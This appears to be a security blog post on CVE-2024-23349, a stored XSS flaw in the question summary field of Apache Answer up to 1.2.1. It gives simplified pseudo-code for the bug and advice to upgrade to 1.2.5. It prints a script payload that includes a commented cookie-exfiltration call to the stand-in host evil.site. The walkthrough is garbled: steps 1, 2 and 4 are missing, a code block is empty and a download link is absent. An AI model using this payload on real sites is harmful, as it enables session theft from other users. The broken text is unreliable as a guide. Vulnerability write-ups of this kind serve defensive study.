CVE-2024-23349 - XSS Vulnerability in Apache Answer (Summary Field) — Full Analysis and Exploit Example

On February 2024, a significant Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-23349, was disclosed in the popular Q&A platform Apache Answer (formerly Answer.dev). The flaw impacts versions of Apache Answer through 1.2.1 (included). This post walks through how the bug works, its security implications, code examples, how to exploit it for educational purposes, and how to protect yourself.

> Official Advisory: Apache Answer CVE-2024-23349
> Upgrade Release: Apache Answer 1.2.5 Release Notes

What is CVE-2024-23349?

CVE-2024-23349 is an improper input neutralization (CWE-79: XSS) issue in Apache Answer. Specifically, it allows any logged-in user to edit their own question submission and inject JavaScript payloads into the summary field. This payload then gets rendered unsanitized on the question page, triggering XSS in the browser of anyone viewing that page. Malicious summaries can steal sessions, deface content, or launch attacks against admins.

Affected Versions: Apache Answer up to and including 1.2.1
Resolved In: Apache Answer 1.2.5

Where's the Bug?

Apache Answer trusted the summary field way too much when questions were edited. Here's a badly simplified logic from the backend:

// (Pseudo-code for Apache Answer endpoint)
app.post('/api/question/update', (req, res) => {
  //... authentication & question ownership checks ...
  const { summary } = req.body;
  // Bug: summary goes straight into DB, no HTML escaping/sanitization
  db.query("UPDATE questions SET summary = ? WHERE id = ?", [summary, req.body.id]);
  res.send({ status: "ok" });
});

// On the question page (frontend):
document.getElementById('question-summary').innerHTML = question.summary; // Not sanitized!

Any HTML or JS in summary gets inserted directly into the rendered output. This is classic, dangerous XSS.

3. In the "Summary" field, enter a payload like

<script>
  alert('XSS by CVE-2024-23349!');
  // or anything more dangerous, like:
  // fetch('https://evil.site/?c='+document.cookie);
</script>

5. Visit the updated question's URL

What happens:
Anyone (including admins) who visits your question will have this code executed in their browser—either an alert, or a cookie grabber, or worse.
This is a stored XSS scenario.

`html

`

The moment your summary appears anywhere, the alert will pop, showing XSS is triggered.

References

- Apache Answer GHSA-p9m2-pjh3-4g86
- Release with the Fix - v1.2.5
- XSS, OWASP Cheat Sheet

How Do I Fix or Mitigate This?

1. Upgrade ASAP to version 1.2.5 or higher. Download here

What Did Apache Answer Change in v1.2.5?

Version 1.2.5 now cleans and sanitizes all user-supplied summaries before saving them and before they’re rendered in templates. Malicious HTML/JS is stripped, neutralizing XSS vectors like the one above.

TL;DR

- CVE-2024-23349 allows logged-in users to inject JavaScript via question summaries in Apache Answer up to 1.2.1.

Stay Secure

Always sanitize user input, encode outputs, and keep your open source software updated. XSS is no joke—don’t let attackers take over your Q&A forum!


References:
Apache Answer Advisory | Answer 1.2.5 Release | OWASP XSS Guide


*This post is for educational and defensive security purposes only. Always follow responsible disclosure and never attack systems you don’t own.*

Timeline

Published on: 02/22/2024 10:15:08 UTC
Last modified on: 12/11/2024 14:22:19 UTC